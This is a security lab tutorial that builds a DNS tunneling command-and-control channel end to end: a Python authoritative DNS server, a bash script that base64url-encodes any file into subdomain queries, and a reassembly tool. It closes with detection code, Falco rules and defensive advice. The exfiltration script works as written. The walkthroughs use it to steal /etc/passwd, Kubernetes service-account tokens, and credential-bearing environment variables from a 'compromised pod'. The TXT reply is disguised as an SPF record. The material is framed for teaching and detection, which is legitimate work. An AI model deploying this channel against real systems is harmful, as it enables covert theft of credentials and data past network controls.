DNS Command & Control: TXT Record Tunneling Lab

DNS Command & Control: TXT Record Tunneling Lab

DNS is the one protocol that almost every firewall allows outbound. Attackers exploit this by encoding stolen data inside DNS queries, where the subdomain labels carry base64-encoded chunks and a custom authoritative DNS server on the other end reassembles them. This technique is used by real-world malware families including SUNBURST, OilRig, and Cobalt Strike's DNS beacon.

This lab builds a complete DNS C2 channel from scratch: a custom DNS server, client exfiltration scripts, server-side reassembly, and detection tools. Everything runs locally with Docker.

How DNS Tunneling Works

Traditional exfiltration uses HTTPS, but DNS tunneling abuses the DNS protocol itself:

  1. TXT Record Bootstrap, the client queries a TXT record to establish a session. The C2 server responds with a unique session ID embedded in the TXT response.

  2. Subdomain Encoding, the client splits data into small chunks, base64-encodes each one, and sends them as subdomain labels in A/CNAME queries: <session>.<seq>.<chunk>.textsip.com

  3. CNAME Flow Control, the server responds with CNAME records pointing to next-<session>.textsip.com, acting as an acknowledgment mechanism.

  4. Server-Side Reassembly, the server logs every chunk with its sequence number. A reassembly tool sorts chunks by sequence, concatenates, and decodes to recover the original file.

Why Attackers Use DNS

  • Firewalls rarely block DNS (port 53 UDP/TCP)
  • DNS queries traverse corporate proxies and NAT transparently
  • Most organizations don't inspect DNS query content
  • Recursive resolvers forward queries to authoritative servers, providing natural routing
  • Low bandwidth is sufficient for credential exfiltration

Architecture

DNS C2 Architecture

Lab Setup

Prerequisites

  • Docker and Docker Compose
  • dig command-line tool (part of bind-utils or dnsutils)

Project Structure

dns-c2-lab/
├── Dockerfile
├── docker-compose.yml
├── requirements.txt
├── dns_server.py           # C2 DNS server
├── reassemble_dns.py       # Payload reassembly tool
├── analyze_dns_logs.py     # Detection/analysis tool
└── logs/                   # Created at runtime

Dockerfile

FROM python:3.12-slim

WORKDIR /app

COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt

COPY dns_server.py .

EXPOSE 53/udp
EXPOSE 53/tcp

CMD ["python", "dns_server.py"]

docker-compose.yml

services:
  textsip-dns:
    build: .
    container_name: textsip-dns
    ports:
      - "5353:53/udp"
      - "5353:53/tcp"
    volumes:
      - ./logs:/app/logs
    restart: unless-stopped

Port 5353 is used to avoid conflicting with your host's DNS resolver on port 53.

requirements.txt

dnslib

Start the Lab

docker compose up -d --build
docker logs -f textsip-dns

You should see:

[+] TextSip DNS lab listening on UDP/TCP 53
[+] Logs: /app/logs
[+] All queries: /app/logs/all_queries.log

The DNS Server

The server handles four types of queries:

TXT Bootstrap, Session Creation

When a client queries textsip.com with type TXT, the server issues a new session:

if qtype == "TXT" and qname == DOMAIN:
    session_id = short_uuid()          # e.g., "2d965f52"
    issued_subdomain = f"{session_id}.textsip.com."
    next_subdomain = f"next-{session_id}.textsip.com."

    txt_value = f"ip4:{issued_subdomain.rstrip('.')}"

    reply.add_answer(RR(
        rname=request.q.qname,
        rtype=QTYPE.TXT,
        rclass=1,
        ttl=15,
        rdata=TXT(txt_value),
    ))

The ip4: prefix makes the TXT response look like an SPF record to casual observers.

Chunk Ingestion, Data Receiving

Chunks arrive as subdomain labels in the format <session>.<seq>.<chunk>.textsip.com:

if len(labels) >= 3 and qtype in ("A", "CNAME", "TXT"):
    session_id = labels[0]        # "2d965f52"
    seq = labels[1]               # "0001"
    chunk = ".".join(labels[2:])  # base64url-encoded data

    session["chunks"][seq] = chunk

    reply.add_answer(RR(
        rname=request.q.qname,
        rtype=QTYPE.CNAME,
        rclass=1,
        ttl=15,
        rdata=CNAME(next_subdomain),
    ))

Entropy Calculation

Every chunk is analyzed for Shannon entropy and encoding patterns, this is used both for server-side logging and as a detection signal:

def shannon_entropy(value):
    if not value:
        return 0.0
    counts = {}
    for c in value:
        counts[c] = counts.get(c, 0) + 1
    entropy = 0.0
    for count in counts.values():
        p = count / len(value)
        entropy -= p * math.log2(p)
    return round(entropy, 3)

def looks_encoded(value):
    raw = value.replace(".", "").replace("=", "")
    if len(raw) < 8:
        return False
    b32 = set("abcdefghijklmnopqrstuvwxyz234567")
    b64url = set("abcdefghijklmnopqrstuvwxyz"
                 "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_")
    if all(c in b32 for c in raw.lower()):
        return True
    if all(c in b64url for c in raw):
        return True
    return False

Full Server Code

#!/usr/bin/env python3

import os
import uuid
import json
import math
import threading
from datetime import datetime, timezone

from dnslib import RR, QTYPE, TXT, CNAME, SOA, NS, A
from dnslib.server import DNSServer, BaseResolver

DOMAIN = "textsip.com."
NS_HOST = "ns1.textsip.com."
LOG_DIR = "/app/logs"

os.makedirs(LOG_DIR, exist_ok=True)

lock = threading.Lock()
issued_sessions = {}


def now_utc():
    return datetime.now(timezone.utc).isoformat()


def short_uuid():
    return uuid.uuid4().hex[:8]


def normalize_qname(qname):
    return str(qname).lower().rstrip(".") + "."


def strip_domain(qname):
    qname = normalize_qname(qname)
    if qname.endswith(DOMAIN):
        return qname[: -len(DOMAIN)].strip(".")
    return qname.strip(".")


def safe_name(value):
    return value.replace("/", "_").replace("\\", "_").replace("..", "_")


def write_json_log(path, event):
    with open(path, "a") as f:
        f.write(json.dumps(event, sort_keys=True) + "\n")


def log_all(event):
    write_json_log(os.path.join(LOG_DIR, "all_queries.log"), event)


def log_session(session_id, event):
    path = os.path.join(LOG_DIR, f"{safe_name(session_id)}.textsip.com.log")
    write_json_log(path, event)


def get_client(handler):
    try:
        return handler.client_address
    except Exception:
        return "unknown", "unknown"


def shannon_entropy(value):
    if not value:
        return 0.0
    counts = {}
    for c in value:
        counts[c] = counts.get(c, 0) + 1
    entropy = 0.0
    for count in counts.values():
        p = count / len(value)
        entropy -= p * math.log2(p)
    return round(entropy, 3)


def looks_encoded(value):
    raw = value.replace(".", "").replace("=", "")
    if len(raw) < 8:
        return False
    b32 = set("abcdefghijklmnopqrstuvwxyz234567")
    b64url = set(
        "abcdefghijklmnopqrstuvwxyz"
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_"
    )
    if all(c in b32 for c in raw.lower()):
        return True
    if all(c in b64url for c in raw):
        return True
    return False


def base_event(event_type, request, handler, extra=None):
    qname = normalize_qname(request.q.qname)
    qtype = QTYPE[request.q.qtype]
    client_ip, client_port = get_client(handler)
    stripped = strip_domain(qname)
    labels = [] if stripped == "" else stripped.split(".")

    event = {
        "time": now_utc(),
        "event_type": event_type,
        "client_ip": client_ip,
        "client_port": client_port,
        "qname": qname,
        "qtype": qtype,
        "labels": labels,
        "label_count": len(labels),
        "qname_length": len(qname),
        "max_label_length": max([len(x) for x in labels], default=0),
    }

    if extra:
        event.update(extra)

    return event


class TextSipResolver(BaseResolver):
    def resolve(self, request, handler):
        reply = request.reply()

        qname = normalize_qname(request.q.qname)
        qtype = QTYPE[request.q.qtype]
        labels = strip_domain(qname).split(".") if qname.endswith(DOMAIN) else []

        query_event = base_event("query_seen", request, handler)
        log_all(query_event)

        # TXT bootstrap
        if qtype == "TXT" and qname == DOMAIN:
            with lock:
                session_id = short_uuid()
                issued_subdomain = f"{session_id}.textsip.com."
                next_subdomain = f"next-{session_id}.textsip.com."

                issued_sessions[session_id] = {
                    "session_id": session_id,
                    "issued_subdomain": issued_subdomain,
                    "next_subdomain": next_subdomain,
                    "created_at": now_utc(),
                    "txt_queries": 1,
                    "subdomain_queries": 0,
                    "chunk_queries": 0,
                    "chunks": {},
                }

            txt_value = f"ip4:{issued_subdomain.rstrip('.')}"

            reply.add_answer(
                RR(
                    rname=request.q.qname,
                    rtype=QTYPE.TXT,
                    rclass=1,
                    ttl=15,
                    rdata=TXT(txt_value),
                )
            )
            log_session(session_id, base_event(
                "txt_issued_session", request, handler,
                {"session_id": session_id, "txt_response": txt_value}
            ))
            return reply

        if qname.endswith(DOMAIN):

            # Chunk: <session>.<seq>.<chunk>.textsip.com
            if len(labels) >= 3 and qtype in ("A", "CNAME", "TXT"):
                session_id = labels[0]
                seq = labels[1]
                chunk = ".".join(labels[2:])

                with lock:
                    session = issued_sessions.get(session_id)
                    if session:
                        session["chunk_queries"] += 1
                        session["chunks"][seq] = chunk
                        next_subdomain = session["next_subdomain"]
                    else:
                        next_subdomain = f"unknown-session.{DOMAIN}"

                log_session(session_id, base_event(
                    "chunk_received", request, handler,
                    {"session_id": session_id, "seq": seq, "chunk": chunk,
                     "chunk_entropy": shannon_entropy(chunk),
                     "encoded_like": looks_encoded(chunk)}
                ))

                reply.add_answer(
                    RR(
                        rname=request.q.qname,
                        rtype=QTYPE.CNAME,
                        rclass=1,
                        ttl=15,
                        rdata=CNAME(next_subdomain),
                    )
                )
                return reply

            # Session query: <session>.textsip.com
            if len(labels) == 1 and qtype in ("A", "CNAME"):
                session_id = labels[0]
                with lock:
                    session = issued_sessions.get(session_id)
                if session:
                    reply.add_answer(
                        RR(
                            rname=request.q.qname,
                            rtype=QTYPE.CNAME,
                            rclass=1,
                            ttl=15,
                            rdata=CNAME(session["next_subdomain"]),
                        )
                    )
                return reply

            # Next query: next-<session>.textsip.com
            if len(labels) == 1 and labels[0].startswith("next-"):
                session_id = labels[0].replace("next-", "", 1)
                with lock:
                    session = issued_sessions.get(session_id)
                if session:
                    done_sub = f"done-{session_id}.textsip.com."
                    reply.add_answer(
                        RR(
                            rname=request.q.qname,
                            rtype=QTYPE.CNAME,
                            rclass=1,
                            ttl=15,
                            rdata=CNAME(done_sub),
                        )
                    )
                return reply

        # NS / SOA / A fallback
        if qtype == "NS" and qname == DOMAIN:
            reply.add_answer(RR(rname=DOMAIN, rtype=QTYPE.NS, rclass=1,
                                ttl=60, rdata=NS(NS_HOST)))
        elif qtype == "SOA" and qname == DOMAIN:
            reply.add_answer(RR(rname=DOMAIN, rtype=QTYPE.SOA, rclass=1,
                                ttl=60, rdata=SOA(mname=NS_HOST,
                                rname="admin.textsip.com.",
                                times=(2026060101, 3600, 600, 86400, 60))))
        elif qtype == "A" and qname == NS_HOST:
            reply.add_answer(RR(rname=request.q.qname, rtype=QTYPE.A,
                                rclass=1, ttl=60, rdata=A("127.0.0.1")))

        return reply


if __name__ == "__main__":
    resolver = TextSipResolver()
    udp = DNSServer(resolver, port=53, address="0.0.0.0", tcp=False)
    tcp = DNSServer(resolver, port=53, address="0.0.0.0", tcp=True)
    udp.start_thread()
    tcp.start_thread()

    print("[+] TextSip DNS lab listening on UDP/TCP 53")
    print("[+] Logs: /app/logs")

    try:
        while True:
            threading.Event().wait(1)
    except KeyboardInterrupt:
        print("[-] shutting down")

Client-Side: Data Exfiltration

Quick Test with dig

First, bootstrap a session:

# Get a session ID from the TXT record
SESSION=$(dig @127.0.0.1 -p 5353 -t txt textsip.com +short \
  | tr -d '"' | cut -d: -f2 | cut -d. -f1)

echo "Session: $SESSION"

Send a single chunk:

# Send chunk with sequence 0001
dig @127.0.0.1 -p 5353 ${SESSION}.0001.SGVsbG8gV29ybGQ.textsip.com +short

Check the server logs:

cat logs/${SESSION}.textsip.com.log | python3 -m json.tool

Full Exfiltration Script

This script exfiltrates any file over DNS:

#!/usr/bin/env bash
set -euo pipefail

# Configuration
DNS_SERVER="127.0.0.1"
DNS_PORT="5353"
DOMAIN="textsip.com"
CHUNK_SIZE=50
FILE="$1"

if [[ -z "${FILE:-}" ]]; then
    echo "Usage: $0 <file-to-exfiltrate>"
    exit 1
fi

if [[ ! -f "$FILE" ]]; then
    echo "[-] File not found: $FILE"
    exit 1
fi

echo "[*] Target file: $FILE ($(wc -c < "$FILE") bytes)"

# Step 1: Bootstrap session via TXT query
echo "[*] Bootstrapping session..."
SESSION=$(dig @${DNS_SERVER} -p ${DNS_PORT} -t txt ${DOMAIN} +short \
    | tr -d '"' | cut -d: -f2 | cut -d. -f1)

if [[ -z "$SESSION" ]]; then
    echo "[-] Failed to get session ID"
    exit 1
fi

echo "[+] Session: $SESSION"

# Step 2: Encode file as base64url (no padding, URL-safe)
ENCODED=$(base64 < "$FILE" | tr '+/' '-_' | tr -d '=\n')
TOTAL=${#ENCODED}
CHUNKS=$(( (TOTAL + CHUNK_SIZE - 1) / CHUNK_SIZE ))

echo "[*] Encoded size: $TOTAL bytes"
echo "[*] Chunks: $CHUNKS (${CHUNK_SIZE} bytes each)"

# Step 3: Send chunks
SEQ=0
OFFSET=0

while [[ $OFFSET -lt $TOTAL ]]; do
    CHUNK="${ENCODED:$OFFSET:$CHUNK_SIZE}"
    SEQ_PAD=$(printf "%04d" $SEQ)

    QNAME="${SESSION}.${SEQ_PAD}.${CHUNK}.${DOMAIN}"

    dig @${DNS_SERVER} -p ${DNS_PORT} "${QNAME}" +short +timeout=2 +tries=1 > /dev/null 2>&1

    echo "[>] seq=${SEQ_PAD} chunk_len=${#CHUNK}"

    SEQ=$((SEQ + 1))
    OFFSET=$((OFFSET + CHUNK_SIZE))

    # Small delay to avoid flooding
    sleep 0.05
done

echo "[+] Done. Sent $SEQ chunks for session $SESSION"
echo "[+] Server log: logs/${SESSION}.textsip.com.log"

Save as exfiltrate.sh and run:

chmod +x exfiltrate.sh

# Exfiltrate /etc/passwd as a test
./exfiltrate.sh /etc/passwd

Exfiltrate Kubernetes Secrets

In a compromised pod, an attacker could exfiltrate service account tokens:

# Inside a compromised K8s pod
./exfiltrate.sh /var/run/secrets/kubernetes.io/serviceaccount/token

Or dump environment variables containing cloud credentials:

env | grep -iE '(aws|azure|gcp|token|secret|key|password)' > /tmp/env_dump.txt
./exfiltrate.sh /tmp/env_dump.txt
rm /tmp/env_dump.txt

Server-Side: Reassembly

After exfiltration, reassemble the chunks on the C2 server:

#!/usr/bin/env python3

import argparse
import base64
import json
import sys
from pathlib import Path


def load_chunks(path):
    chunks = []
    with open(path, "r") as f:
        for line in f:
            line = line.strip()
            if not line:
                continue
            try:
                obj = json.loads(line)
            except Exception:
                continue
            if obj.get("event_type") != "chunk_received":
                continue
            seq = obj.get("seq")
            chunk = obj.get("chunk")
            if seq is None or chunk is None:
                continue
            try:
                seq_num = int(seq)
            except Exception:
                continue
            chunks.append((seq_num, chunk, obj))
    chunks.sort(key=lambda x: x[0])
    return chunks


def decode_payload(payload, encoding):
    if encoding == "none":
        return payload.encode()
    if encoding == "base64":
        return base64.b64decode(payload)
    if encoding == "base64url":
        padded = payload + "=" * (-len(payload) % 4)
        return base64.urlsafe_b64decode(padded)
    if encoding == "base32":
        padded = payload + "=" * (-len(payload) % 8)
        return base64.b32decode(padded.upper())
    raise ValueError(f"unsupported encoding: {encoding}")


def main():
    parser = argparse.ArgumentParser(
        description="Reassemble exfiltrated data from DNS session logs."
    )
    parser.add_argument("logfile", help="Path to session log file")
    parser.add_argument("-e", "--encoding", default="base64url",
                        choices=["base64", "base64url", "base32", "none"])
    parser.add_argument("-o", "--output", default="recovered.bin")
    args = parser.parse_args()

    logfile = Path(args.logfile)
    if not logfile.exists():
        print(f"[-] Log file not found: {logfile}")
        sys.exit(1)

    chunks = load_chunks(logfile)
    if not chunks:
        print("[-] No chunk_received events found")
        sys.exit(1)

    seqs = [seq for seq, _, _ in chunks]
    missing = [i for i in range(min(seqs), max(seqs) + 1) if i not in seqs]
    payload = "".join(chunk for _, chunk, _ in chunks)

    print(f"[+] Chunks: {len(chunks)}")
    print(f"[+] Seq range: {min(seqs)} - {max(seqs)}")
    print(f"[+] Missing: {len(missing)}")
    print(f"[+] Encoded size: {len(payload)}")

    if missing:
        print(f"[!] Missing sequences: {missing[:20]}")

    try:
        decoded = decode_payload(payload, args.encoding)
    except Exception as e:
        print(f"[-] Decode failed: {e}")
        sys.exit(1)

    Path(args.output).write_bytes(decoded)
    print(f"[+] Wrote {len(decoded)} bytes to {args.output}")


if __name__ == "__main__":
    main()

Run it:

# Find the session log
ls logs/*.textsip.com.log

# Reassemble
python3 reassemble_dns.py logs/<session>.textsip.com.log \
    -e base64url \
    -o recovered_file.txt

# Verify
diff /etc/passwd recovered_file.txt

Detection & Analysis

Log Analysis Tool

This tool scans DNS logs for tunneling indicators:

#!/usr/bin/env python3

import argparse
import json
from collections import Counter
from pathlib import Path


def read_events(path):
    events = []
    with open(path, "r") as f:
        for line in f:
            try:
                events.append(json.loads(line))
            except Exception:
                pass
    return events


def analyze_file(path):
    events = read_events(path)
    event_types = Counter(e.get("event_type", "unknown") for e in events)
    chunk_events = [e for e in events if e.get("event_type") == "chunk_received"]

    suspicious = []
    for e in chunk_events:
        reasons = []
        if e.get("chunk_length", 0) >= 40:
            reasons.append("long_chunk")
        if e.get("chunk_entropy", 0) >= 4.0:
            reasons.append("high_entropy")
        if e.get("encoded_like"):
            reasons.append("encoded_like")
        if e.get("label_count", 0) >= 4:
            reasons.append("many_labels")

        if reasons:
            suspicious.append({
                "time": e.get("time"),
                "client_ip": e.get("client_ip"),
                "seq": e.get("seq"),
                "chunk_length": e.get("chunk_length"),
                "entropy": e.get("chunk_entropy"),
                "reasons": reasons,
            })

    return {
        "total_events": len(events),
        "event_types": dict(event_types),
        "chunk_events": len(chunk_events),
        "suspicious": suspicious,
    }


def main():
    parser = argparse.ArgumentParser(
        description="Analyze DNS logs for tunneling indicators."
    )
    parser.add_argument("path", help="Log file or directory")
    args = parser.parse_args()

    target = Path(args.path)
    files = sorted(target.glob("*.log")) if target.is_dir() else [target]

    for file in files:
        result = analyze_file(file)
        print(f"\n{'=' * 60}")
        print(f"File: {file}")
        print(f"Total events: {result['total_events']}")
        print(f"Chunk events: {result['chunk_events']}")
        print(f"Suspicious: {len(result['suspicious'])}")

        for item in result["suspicious"][:10]:
            print(f"  seq={item['seq']} len={item['chunk_length']} "
                  f"entropy={item['entropy']} "
                  f"reasons={','.join(item['reasons'])}")


if __name__ == "__main__":
    main()

Run against the logs directory:

python3 analyze_dns_logs.py logs/

Detection Signals

Signal Threshold Why
Shannon entropy per label >= 4.0 bits Normal subdomains have low entropy; base64 data is ~5.5
Label length >= 40 chars Normal subdomains are short; tunnel chunks approach 63 char limit
Encoded-like characters base32/base64url charset Normal domains use readable words, not random alphanum
Query volume to single domain > 50 queries/minute Tunneling generates many sequential queries
Unusual TXT query volume Baseline deviation Bootstrap queries are uncommon for most domains
Sequential subdomain patterns <hex>.<digits>.<random> The session.seq.chunk pattern is distinctive

DNS Tunneling Limits

Understanding the protocol limits helps calibrate detection thresholds:

Constraint Limit Impact
Single DNS label 63 characters Max chunk size per label
Full hostname 253 characters Total query length including domain
Practical payload per query 30-50 bytes raw After encoding overhead and metadata labels
Throughput ~100-200 bytes/sec Many small queries, not bulk transfer

Falco Rules

- rule: DNS Tunneling via dig
  desc: Detects rapid dig queries with high-entropy subdomains
  condition: >
    spawned_process and
    proc.name = "dig" and
    proc.args contains "textsip" or
    (proc.name = "dig" and proc.pcmdline contains "while")
  output: >
    Potential DNS tunneling via dig
    (user=%user.name command=%proc.cmdline parent=%proc.pname)
  priority: WARNING

- rule: Suspicious DNS Exfiltration Script
  desc: Detects scripts reading files and piping to base64 with dig
  condition: >
    spawned_process and
    proc.name = "base64" and
    proc.pname in ("bash", "sh", "zsh") and
    proc.aname[2] in ("bash", "sh", "zsh")
  output: >
    File encoding detected, possible DNS exfiltration staging
    (user=%user.name command=%proc.cmdline)
  priority: HIGH

Network-Level Detection

# Count unique subdomains per domain (high count = tunneling)
tcpdump -n -i any port 53 2>/dev/null \
  | grep -oP '[\w.-]+\.textsip\.com' \
  | sort -u \
  | wc -l

# Log all DNS queries with tshark
tshark -i any -f "port 53" -T fields \
  -e frame.time -e ip.src -e dns.qry.name -e dns.qry.type \
  > dns_capture.log

Defensive Recommendations

  1. Monitor DNS query patterns, alert on high volume, high entropy, or unusual TXT queries to single domains
  2. Deploy DNS logging, capture all queries at the resolver level (CoreDNS, Unbound, or passive DNS tap)
  3. Use DNS filtering, block queries to uncategorized or newly registered domains
  4. Inspect TXT records, legitimate TXT records are SPF, DKIM, DMARC; random data in TXT is suspicious
  5. Rate limit DNS, cap queries per source IP per domain per minute
  6. Network segmentation, workloads that don't need DNS (or only need specific domains) should have restricted egress